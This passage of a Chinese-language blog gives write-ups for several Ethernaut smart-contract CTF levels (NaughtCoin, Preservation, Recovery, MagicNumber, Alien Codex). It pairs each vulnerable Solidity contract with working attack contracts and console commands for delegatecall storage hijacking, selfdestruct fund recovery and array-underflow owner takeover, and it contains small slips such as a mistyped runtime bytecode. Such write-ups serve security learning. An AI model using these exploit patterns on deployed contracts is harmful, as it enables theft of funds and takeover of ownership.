&quot;openzeppelin-contracts-08/token/ERC20/ERC20.sol&quot;;<br><br>contract NaughtCoin is ERC20 &#123;<br>    // string public constant name = &#x27;NaughtCoin&#x27;;<br>    // string public constant symbol = &#x27;0x0&#x27;;<br>    // uint public constant decimals = 18;<br>    uint256 public timeLock = block.timestamp + 10 * 365 days;<br>    uint256 public INITIAL_SUPPLY;<br>    address public player;<br><br>    constructor(address _player) ERC20(&quot;NaughtCoin&quot;, &quot;0x0&quot;) &#123;<br>        player = _player;<br>        INITIAL_SUPPLY = 1000000 * (10 ** uint256(decimals()));<br>        // _totalSupply = INITIAL_SUPPLY;<br>        // _balances[player] = INITIAL_SUPPLY;<br>        _mint(player, INITIAL_SUPPLY);<br>        emit Transfer(address(0), player, INITIAL_SUPPLY);<br>    &#125;<br><br>    function transfer(address _to, uint256 _value) public override lockTokens returns (bool) &#123;<br>        super.transfer(_to, _value);<br>    &#125;<br><br>    // Prevent the initial owner from transferring tokens until the timelock has passed<br>    modifier lockTokens() &#123;<br>        if (msg.sender == player) &#123;<br>            require(block.timestamp &gt; timeLock);<br>            _;<br>        &#125; else &#123;<br>            _;<br>        &#125;<br>    &#125;<br>&#125;<br></code></pre></td></tr></table></figure>

<p>要求代币变为0即可。</p>
<p>ERC20标准转账代币有两种方式，transfer以及transferFrom，但是transfer被重写了，所以只能用</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs solidity">function transferFrom(<br>        address from,<br>        address to,<br>        uint256 amount<br>    ) public virtual override returns (bool) &#123;<br>        address spender = _msgSender();<br>        _spendAllowance(from, spender, amount);<br>        _transfer(from, to, amount);<br>        return true;<br>    &#125;<br></code></pre></td></tr></table></figure>

<p>但是转帐前，需要approver授权。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs solidity">//secondaddr是另外一个账户地址<br>secondad=&#x27;0x02823a3D576A35988a623BB3d7F9e9A6D0ae7674&#x27;<br>totalvalue=&#x27;1000000000000000000000000&#x27;<br>//给自己授权<br>await contract.approve(player,totalvalue)<br>await contract.transferFrom(player,secondaddr,totalvalue)<br></code></pre></td></tr></table></figure>







<h3 id="Preservation"><a href="#Preservation" class="headerlink" title="Preservation"></a><strong>Preservation</strong></h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br></pre></td><td class="code"><pre><code class="hljs solidity">// SPDX-License-Identifier: MIT<br>pragma solidity ^0.8.0;<br><br>contract Preservation &#123;<br>    // public library contracts<br>    address public timeZone1Library;<br>    address public timeZone2Library;<br>    address public owner;<br>    uint256 storedTime;<br>    // Sets the function signature for delegatecall<br>    bytes4 constant setTimeSignature = bytes4(keccak256(&quot;setTime(uint256)&quot;));<br><br>    constructor(address _timeZone1LibraryAddress, address _timeZone2LibraryAddress) &#123;<br>        timeZone1Library = _timeZone1LibraryAddress;<br>        timeZone2Library = _timeZone2LibraryAddress;<br>        owner = msg.sender;<br>    &#125;<br><br>    // set the time for timezone 1<br>    function setFirstTime(uint256 _timeStamp) public &#123;<br>        timeZone1Library.delegatecall(abi.encodePacked(setTimeSignature, _timeStamp));<br>    &#125;<br><br>    // set the time for timezone 2<br>    function setSecondTime(uint256 _timeStamp) public &#123;<br>        timeZone2Library.delegatecall(abi.encodePacked(setTimeSignature, _timeStamp));<br>    &#125;<br>&#125;<br><br>// Simple library contract to set the time<br>contract LibraryContract &#123;<br>    // stores a timestamp<br>    uint256 storedTime;<br><br>    function setTime(uint256 _time) public &#123;<br>        storedTime = _time;<br>    &#125;<br>&#125;<br></code></pre></td></tr></table></figure>

<p>要求获得合约所有权。</p>
<p>本题的关键就是delegatecall函数，该函数调用后内置变量 <code>msg</code> 的值不会修改为调用者，但执行环境为调用者的运行环境（相当于复制被调用者的代码到调用者合约）。也就是说</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs solidity"> function setFirstTime(uint256 _timeStamp) public &#123;<br>        timeZone1Library.delegatecall(abi.encodePacked(setTimeSignature, _timeStamp));<br>    &#125;<br>function setSecondTime(uint256 _timeStamp) public &#123;<br>        timeZone2Library.delegatecall(abi.encodePacked(setTimeSignature, _timeStamp));<br>    &#125;<br></code></pre></td></tr></table></figure>

<p>当这两个函数调用时，他们改变的是slot0的变量，而我们要求改变合约的拥有者，即slot2处的变量。而这两个合约的变量分布为</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><code class="hljs solidity">===================================================<br>    unused       |                timeZone1Library<br>---------------------------------------------------         slot 0<br>    12 bytes     |                20 bytes<br>===================================================<br>    unused       |                timeZone2Library<br>---------------------------------------------------         slot 1<br>    12 bytes     |                20 bytes<br>===================================================<br>    unused       |                owner<br>---------------------------------------------------         slot 2<br>    12 bytes     |                20 bytes<br>===================================================<br>                storedTime<br>---------------------------------------------------         slot 3<br>                32 bytes<br>===================================================<br></code></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs solidity">===================================================<br>                storedTime<br>---------------------------------------------------         slot 0<br>                32 bytes<br>===================================================<br></code></pre></td></tr></table></figure>

<p>所以当我们调用setFirstTime函数时，我们调用的是setTime函数。因此，我们可以将timeZone1Library的地址改为攻击合约的地址，然后在攻击合约中写一个setime函数，当执行imeZone1Library.delegatecall(abi.encodePacked(setTimeSignature, _timeStamp));时，就可以调用攻击合约的setime函数。</p>
<p>我们需要注意owner占据slot2 的低20个字节即可</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><code class="hljs solidity">pragma solidity ^0.8.0;<br><br>contract AttackPreservation &#123;<br><br>    // stores a timestamp<br>    address doesNotMatterWhatThisIsOne;<br>    address doesNotMatterWhatThisIsTwo;<br>    address maliciousIndex;<br><br>    function setTime(uint _time) public &#123;<br>        maliciousIndex = address(uint160(_time));<br>    &#125;<br>&#125;<br><br></code></pre></td></tr></table></figure>

<p>部署完成后，执行await contract.setFirstTime(‘攻击合约’)</p>
<p>然后再执行 await contract.setFirstTime(‘player’)就可以了。</p>
<h3 id="Recovery"><a href="#Recovery" class="headerlink" title="Recovery"></a><strong>Recovery</strong></h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><code class="hljs solidity">// SPDX-License-Identifier: MIT<br>pragma solidity ^0.8.0;<br><br>contract Recovery &#123;<br>    //generate tokens<br>    function generateToken(string memory _name, uint256 _initialSupply) public &#123;<br>        new SimpleToken(_name, msg.sender, _initialSupply);<br>    &#125;<br>&#125;<br><br>contract SimpleToken &#123;<br>    string public name;<br>    mapping(address =&gt; uint256) public balances;<br><br>    // constructor<br>    constructor(string memory _name, address _creator, uint256 _initialSupply) &#123;<br>        name = _name;<br>        balances[_creator] = _initialSupply;<br>    &#125;<br><br>    // collect ether in return for tokens<br>    receive() external payable &#123;<br>        balances[msg.sender] = msg.value * 10;<br>    &#125;<br><br>    // allow transfers of tokens<br>    function transfer(address _to, uint256 _amount) public &#123;<br>        require(balances[msg.sender] &gt;= _amount);<br>        balances[msg.sender] = balances[msg.sender] - _amount;<br>        balances[_to] = _amount;<br>    &#125;<br><br>    // clean up after ourselves<br>    function destroy(address payable _to) public &#123;<br>        selfdestruct(_to);<br>    &#125;<br>&#125;<br></code></pre></td></tr></table></figure>

<p>从合约地址找回丢失的0.5eth</p>
<h4 id="Analyse-3"><a href="#Analyse-3" class="headerlink" title="Analyse"></a>Analyse</h4><p>通过自毁函数进行转账</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs solidity">function destroy(address payable _to) public &#123;<br>      selfdestruct(_to);<br>  &#125;<br></code></pre></td></tr></table></figure>

<p>更新msg.sender余额</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs solidity">function transfer(address _to, uint256 _amount) public &#123;<br>     require(balances[msg.sender] &gt;= _amount);<br>     balances[msg.sender] = balances[msg.sender] - _amount;<br>     balances[_to] = _amount;<br> &#125;<br></code></pre></td></tr></table></figure>



<p>只需找到合约地址实行自毁函数将eth转会玩家地址就行。</p>
<h5 id="寻找地址"><a href="#寻找地址" class="headerlink" title="寻找地址"></a>寻找地址</h5><ol>
<li><p>通过etherscan进行查找</p>
</li>
<li><p>计算得到</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs solidity">pragma solidity ^0.8.0;<br><br>contract Hack &#123;<br>    function getdd(address target) public view returns (address) &#123;<br>        address data = address(uint160(uint256(keccak256(abi.encodePacked(bytes1(0xd6), bytes1(0x94), target, bytes1(0x01))))));<br>        return data; //0x8B7bAdf88cBaE3F8Ed26Df75475133E4972bB606<br>    &#125;<br>&#125;<br><br></code></pre></td></tr></table></figure></li>
</ol>
<h4 id="Attack-1"><a href="#Attack-1" class="headerlink" title="Attack"></a>Attack</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><code class="hljs solidity">pragma solidity ^0.8.0;<br><br>contract attack &#123;<br>    address payable target; //合约地址<br>    address payable myaddr; //player<br><br>    constructor(address payable _addr, address payable _myaddr) public &#123;<br>        target=_addr;<br>        myaddr=_myaddr;<br>    &#125;<br>    <br>    function exploit() public&#123;<br>        target.call(abi.encodeWithSignature(&quot;destroy(address)&quot;,myaddr));<br>    &#125;<br><br>&#125;<br></code></pre></td></tr></table></figure>

<p>部署后运行 exploit函数就行。</p>
<h3 id="MagicNumber"><a href="#MagicNumber" class="headerlink" title="MagicNumber"></a><strong>MagicNumber</strong></h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><code class="hljs solidity">// SPDX-License-Identifier: MIT<br>pragma solidity ^0.8.0;<br><br>contract MagicNum &#123;<br>    address public solver;<br><br>    constructor() &#123;&#125;<br><br>    function setSolver(address _solver) public &#123;<br>        solver = _solver;<br>    &#125;<br><br>    /*<br>    ____________/\\\_______/\\\\\\\\\_____        <br>     __________/\\\\\_____/\\\///////\\\___       <br>      ________/\\\/\\\____\///______\//\\\__      <br>       ______/\\\/\/\\\______________/\\\/___     <br>        ____/\\\/__\/\\\___________/\\\//_____    <br>         __/\\\\\\\\\\\\\\\\_____/\\\//________   <br>          _\///////////\\\//____/\\\/___________  <br>           ___________\/\\\_____/\\\\\\\\\\\\\\\_ <br>            ___________\///_____\///////////////__<br>    */<br>&#125;<br></code></pre></td></tr></table></figure>

<figure class="highlight scss"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs scss">题目的意思就是部署一个合约 Solver ，要求在被调用 <span class="hljs-built_in">whatIsTheMeaningOfLife</span>() 函数时返回 <span class="hljs-number">42</span> 就可以了，但有一个限制是不能超过 <span class="hljs-number">10</span> 个 opcode<br></code></pre></td></tr></table></figure>

<h4 id="合约创建"><a href="#合约创建" class="headerlink" title="合约创建"></a>合约创建</h4><p><a target="_blank" rel="noopener" href="https://medium.com/coinmonks/ethernaut-lvl-19-magicnumber-walkthrough-how-to-deploy-contracts-using-raw-assembly-opcodes-c50edb0f71a2">Ethernaut Lvl 19 MagicNumber Walkthrough: How to deploy contracts using raw assembly opcodes | by Nicole Zhu | Coinmonks | Medium</a></p>
<ol>
<li><p>首先，用户或合约想以太坊发送交易。包括数据但没有接受人的地址（没有 <code>to</code> 地址）。此格式向 EVM 指示是 ，而不是常规发送&#x2F;调用事务。<code>contract creation</code></p>
</li>
<li><p>然后,EVM将solidity中的代码翻译为字节码，可直接转为操作码，在单个调用栈堆中执行。需要注意的重要一点：字节码包含 1） 和 2） 合约的实际值，按顺序连接。<code>contract creation</code>：<code>initialization code``runtime code</code></p>
</li>
<li><p>在congtract creation期间，EVM仅仅执行initialzation code，知道到达栈堆中第一条stop或start令，在此期间，合约的contructor会执行，合约就有地址了。在运行 <code>initialization code</code> 后，只有 <code>runtime code</code> 在堆栈上，然后将这些 <strong>opcode</strong> <strong>拷贝</strong> 到 <code>memory</code> 并返回到 <code>EVM</code></p>
</li>
<li><p>最后，EVM将runtime code返回的opcode存储在state storage，并于新地址相关联，合约被调用时，这些runtime code将会执行。</p>
</li>
</ol>
<h4 id="Analyse-4"><a href="#Analyse-4" class="headerlink" title="Analyse"></a>Analyse</h4><ul>
<li><p>所以为了解决该题，我们需要</p>
<figure class="highlight aspectj"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs aspectj"><span class="hljs-keyword">initialization</span> opcodes<br></code></pre></td></tr></table></figure>

<figure class="highlight ebnf"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs ebnf"><span class="hljs-attribute">runtime codes</span><br></code></pre></td></tr></table></figure>

<ul>
<li><code>initialization opcodes</code>: 由 <code>EVM</code> 运行创建合约并存储将来要用的 <code>runtime codes</code></li>
<li><code>runtime codes</code>: 包含所需的实际执行逻辑。对于本题来说，这是应该返回的代码的主要部分，应该 <strong>return 42</strong> 并且 <strong>under 10 opcodes</strong></li>
</ul>
</li>
</ul>
<h5 id="runtime-codes"><a href="#runtime-codes" class="headerlink" title="runtime codes :"></a>runtime codes :</h5><p>返回值由 return(p,s)，在此之前，使用mstore（p，v）储存在内存中</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs solidity">0x602a     ;PUSH1 0x2a                  v<br>0x6080     ;PUSH1 0x80                  p<br>0x52       ;MSTORE  #将0x2a移动到0x80<br><br>首先，使用 mstore(p, v) 将 42 存储在内存中，其中 p 是在内存中的存储位置， v 是十六进制值，42 的十六进制是 0x2a<br></code></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs solidity">0x6020     ;PUSH1 0x20                  s<br>0x6080     ;PUSH1 0x80                  p<br>0xf3       ;RETURN<br><br>使用 return(p, s) 返回 0x2a ，其中 p 是值 0x2a 存储的位置，s 是值 0x2a 存储所占的大小 0x20 ，占32字节<br></code></pre></td></tr></table></figure>

<p>runtime codes ：302a60805260206080f3 正好10 opcodes</p>
<h5 id="initialization-codes"><a href="#initialization-codes" class="headerlink" title="initialization codes"></a>initialization codes</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs solidity">;copy bytecode to memory<br>0x600a     ;PUSH1 0x0a                      S(runtime code size)<br>0x60??     ;PUSH1 0x??                      F(current position of runtime opcodes)<br>0x6000     ;PUSH1 0x00                      T(destination memory index 0)<br>0x39       ;CODECOPY<br>首先，initialization codes 需要先将 runtime codes 拷贝到内存，然后再将其返回到 EVM 。将代码从一个地方复制到另一个地方是 codecopy(t, f, s) 操作码。t 是代码的目标位置，f 是 runtime codes 的当前位置，s 是代码的大小，以字节为单位，对于 602a60805260206080f3 就是 10 bytes<br><br><br>第一步PUSH1 0x0a对应的是length变量，因为我们上面构造的opcode序列长度为10。第二步PUSH1 0x0c是因为，初始化代码的长度为0xB，也就是运行时代码的字节码是从0xc偏移开始的，因此offset为0xc。第三步PUSH1 0是指定将我们的代码复制到memory的slot 0处。前4条指令，完成了将0xC到0x16这10个字节复制到memory的0x00到0xA位置处的任务（，60 0c指令确实起到了指定源代码起始偏移量的作用。正如您所指出的，前面的6个字节（60 0a 60 0c 60 00 39）是用来配置这次复制操作的指令，分别指定了复制的长度、源代码的起始偏移以及目标内存的起始位置。因此，从第7个字节（偏移量0x0c）开始的数据才是实际需要被复制的代码内容。）<br><br></code></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs solidity">;return code from memory to EVM<br>0x600a     ;PUSH1 0x0a                      S<br>0x6000     ;PUSH1 0x00                      P<br>0xf3       ;RETURN<br>需要将内存中的 runtime codes 返回到 EVM<br></code></pre></td></tr></table></figure>

<ul>
<li><code>initialization codes</code> 总共占了 <strong>0x0c</strong> 字节，这表示 <code>runtime codes</code> 从索引 <strong>0x0c</strong> 开始，所以 <strong>??</strong> 的地方是 <strong>0x0c</strong></li>
<li>所以，<code>initialization codes</code> 最后的顺序是 <strong>600a600c600039600a6000f3</strong></li>
</ul>
<p>initialization codes：600a600c600039600a6000f3</p>
<h4 id="Solution"><a href="#Solution" class="headerlink" title="Solution"></a>Solution</h4><p>opcodes  ：<strong>0x600a600c600039600a6000f3602a60805260206080f3</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs solidity"><br>var bytecode = &quot;0x600a600c600039600a6000f3602a60805260206080f3&quot;;<br>web3.eth.sendTransaction(&#123; from: player, data: bytecode &#125;, function(err,res)&#123;console.log(res)&#125;);<br>#查看交易记录 得到 to：0x820e93bfa60c20a9166e0955fd842d09f268b1ca<br>await contract.setSolver(&#x27;0x820e93bfa60c20a9166e0955fd842d09f268b1ca&#x27;);<br></code></pre></td></tr></table></figure>
<h3 id="Alien-Codex"><a href="#Alien-Codex" class="headerlink" title="Alien Codex"></a>Alien Codex</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><code class="hljs solidity">// SPDX-License-Identifier: MIT<br>pragma solidity ^0.5.0;<br><br>import &quot;../helpers/Ownable-05.sol&quot;;<br><br>contract AlienCodex is Ownable &#123;<br>    bool public contact;<br>    bytes32[] public codex;<br><br>    modifier contacted() &#123;<br>        assert(contact);<br>        _;<br>    &#125;<br><br>    function makeContact() public &#123;<br>        contact = true;<br>    &#125;<br><br>    function record(bytes32 _content) public contacted &#123;<br>        codex.push(_content);<br>    &#125;<br><br>    function retract() public contacted &#123;<br>        codex.length--;<br>    &#125;<br><br>    function revise(uint256 i, bytes32 _content) public contacted &#123;<br>        codex[i] = _content;<br>    &#125;<br>&#125;<br></code></pre></td></tr></table></figure>
<!-- You've uncovered an Alien contract. Claim ownership to complete the level.

  Things that might help

Understanding how array storage works
Understanding ABI specifications
Using a very underhanded approach -->

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br></pre></td><td class="code"><pre><code class="hljs solidity">// SPDX-License-Identifier: MIT<br><br>pragma solidity ^0.6.0;<br><br>import &quot;../GSN/Context.sol&quot;;<br>/**<br> * @dev Contract module which provides a basic access control mechanism, where<br> * there is an account (an owner) that can be granted exclusive access to<br> * specific functions.<br> *<br> * By default, the owner account will be the one that deploys the contract. This<br> * can later be changed with &#123;transferOwnership&#125;.<br> *<br> * This module is used through inheritance. It will make available the modifier<br> * `onlyOwner`, which can be applied to your functions to restrict their use to<br> * the owner.<br> */<br>contract Ownable is Context &#123;<br>    address private _owner;<br><br>    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);<br><br>    /**<br>     * @dev Initializes the contract setting the deployer as the initial owner.<br>     */<br>    constructor () internal &#123;<br>        address msgSender = _msgSender();<br>        _owner = msgSender;<br>        emit OwnershipTransferred(address(0), msgSender);<br>    &#125;<br><br>    /**<br>     * @dev Returns the address of the current owner.<br>     */<br>    function owner() public view returns (address) &#123;<br>        return _owner;<br>    &#125;<br><br>    /**<br>     * @dev Throws if called by any account other than the owner.<br>     */<br>    modifier onlyOwner() &#123;<br>        require(_owner == _msgSender(), &quot;Ownable: caller is not the owner&quot;);<br>        _;<br>    &#125;<br><br>    /**<br>     * @dev Leaves the contract without owner. It will not be possible to call<br>     * `onlyOwner` functions anymore. Can only be called by the current owner.<br>     *<br>     * NOTE: Renouncing ownership will leave the contract without an owner,<br>     * thereby removing any functionality that is only available to the owner.<br>     */<br>    function renounceOwnership() public virtual onlyOwner &#123;<br>        emit OwnershipTransferred(_owner, address(0));<br>        _owner = address(0);<br>    &#125;<br><br>    /**<br>     * @dev Transfers ownership of the contract to a new account (`newOwner`).<br>     * Can only be called by the current owner.<br>     */<br>    function transferOwnership(address newOwner) public virtual onlyOwner &#123;<br>        require(newOwner != address(0), &quot;Ownable: new owner is the zero address&quot;);<br>        emit OwnershipTransferred(_owner, newOwner);<br>        _owner = newOwner;<br>    &#125;<br>&#125;<br></code></pre></td></tr></table></figure>
<h4 id="Analyse-5"><a href="#Analyse-5" class="headerlink" title="Analyse"></a>Analyse</h4><p>要求获得owner的权限，合约继承自Owenable合约，其中有 _owenr状态变量，则可以推出存储布局</p>
<figure class="highlight asciidoc"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs asciidoc"><span class="hljs-code">-------------------------------</span><br><span class="hljs-code">|   contact(1)| _owner(20)    | &lt;- slot 0</span><br><span class="hljs-code">-------------------------------</span><br><span class="hljs-section">|       codex.length(32)      | &lt;- slot 1</span><br><span class="hljs-section">-------------------------------</span><br>|          codex[0]           | &lt;- slot keccak256(1)<br><span class="hljs-code">-------------------------------</span><br><span class="hljs-code">|           ...               | &lt;- slot ...</span><br><span class="hljs-code">-------------------------------</span><br>| codex[2^256-1-keccak256(1)] | &lt;- slot max<br>-------------------------------<br></code></pre></td></tr></table></figure>
<p>可以看出codex长度没有设置，可以通过retract函数可以使数组长度溢出，然后可以通过revise方法进行数组赋值。所以，本题可以codex数组溢出到slot0来修改owner的存储。<br>x&#x3D;keccak256(bytes32(1))) ，那么当我们修改 codex[y],(y&#x3D;2^256-x+0) 时就能修改 slot 0 ，从而修改 owner。<br>但是由于函数修改器的存在，我们需要使用makeContact()函数来解除限制。</p>
<h4 id="Attack-2"><a href="#Attack-2" class="headerlink" title="Attack"></a>Attack</h4><p>第一步我们先解除限制</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs js"><span class="hljs-keyword">await</span> contract.<span class="hljs-title function_">makeContact</span>()<br></code></pre></td></tr></table></figure>
<p>然后使用retract实现数组溢出</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs js"><span class="hljs-keyword">await</span> contract.<span class="hljs-title function_">retract</span>()<br></code></pre></td></tr></table></figure>
<p>由于数组长度没有定义，所以为0，只要调用retract()函数，就会溢出，然后调用revise()函数修改数组长度，从而修改owner。<br>然后只需修改codex[2^256 - keccak256(1)]的值就可以改变owner。</p>
